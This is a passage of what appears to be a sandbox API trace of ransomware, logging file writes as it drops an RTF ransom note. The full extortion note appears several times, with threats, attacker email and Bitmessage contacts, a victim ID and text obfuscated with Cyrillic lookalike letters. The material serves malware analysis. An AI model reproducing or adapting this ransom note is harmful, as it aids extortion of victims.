safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.149] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.149] CloseHandle (hObject=0x2e8) returned 1 [0292.149] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0292.149] GetLastError () returned 0x2 [0292.150] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and 